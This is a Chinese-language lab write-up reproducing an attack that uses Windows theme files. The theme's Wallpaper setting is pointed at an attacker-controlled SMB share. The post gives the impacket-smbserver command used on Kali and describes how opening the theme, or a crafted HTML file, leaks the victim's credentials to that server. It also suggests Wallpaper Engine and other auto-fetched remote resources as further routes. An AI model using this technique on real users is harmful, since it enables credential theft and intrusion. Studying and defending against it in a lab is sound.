最近看到嘶吼發的一篇文章
很感興趣,於是決定試一試。根據文章中所說的資訊進行了複現,記錄一下複現過程。
#
複現過程
攻擊機:kali 192.168.233.128
靶機:win server 2012 192.168.233.130
win10 192.168.233.1
首先製作惡意主題包
右擊桌面,選擇到主題,選擇已應用的主題,右擊導出主題文件
導出文件為 deskthemepack 後綴。使用壓縮文件打開該文件獲得 theme 文件
用文本編輯器打開 theme 文件,來到 [Control Panel\Desktop] 塊下面,找到 Wallpaper 參數。利用地點就在這裡。這裡規定了壁紙的引用地址,可以是本地文件也可以是一個網絡地址。而網絡地址又支持多種協議。所以就功能來講確實不算是漏洞,微軟拒絕修復也很正常。
我們將 Wallpaper 的值設置為一個 SMB 共享文件 192.168.233.128\a\shell.png (攻擊者開啟的 smb 服務)
然後保存。進入 kali 開啟 smb 服務。我們可以使用 impacket 進行快速搭建服務。impacket 具體用法請自行百度
impacket-smbserver a pwd
如果失敗記得加上 sudo
開啟成功後模擬被害者操作
雙擊 theme 文件安裝主題,這個時候 kali 裡面就會收到用戶的憑證信息
注意:SMB 服務器一定要在正常運行,不然靶機會桌面無響應。
這就是整個攻擊流程。其實最本質的思想就是在一些無需授權的功能處訪問無密碼 smb 資源時會默認傳遞系統自己的憑證信息。將這個思路擴大還有其他玩法。比如近些年火熱的動態壁紙軟件 wallpaper engine 也有一個外部資源訪問的功能
這個也可以利用
還有什麼呢?其實 HTML 也可以。正好在 win server 中沒有主題這個玩意,於是便可以利用 HTML 進行攻擊
訪問惡意 HTML 文件
SMB 服務器同樣收到了憑證信息
至此兩台靶機全都攻擊成功。
最後想一想其實可以攻擊的手段還有很多,只要是遠程資源,自動訪問,都可以進行這個攻擊。但是在實驗時發現了問題,445 端口在網絡運營商那一層就被屏蔽掉了,據說是為了防禦永恒之藍。win 系統又不支持非標準 smb 訪問,所以這個手法在國內大概只能用於內網了吧。國外環境因為複現麻煩就沒再嘗試。
END